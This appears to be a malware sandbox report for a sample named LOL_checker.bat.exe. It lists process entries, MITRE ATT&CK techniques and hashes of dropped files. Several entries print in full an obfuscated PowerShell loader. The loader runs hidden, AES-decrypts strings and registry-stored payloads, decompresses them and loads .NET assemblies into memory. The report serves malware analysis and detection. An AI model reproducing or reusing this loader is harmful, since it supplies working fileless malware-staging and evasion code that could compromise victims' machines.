[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:2036
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:4904
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      PID:1588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vinoa1xg.jyj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
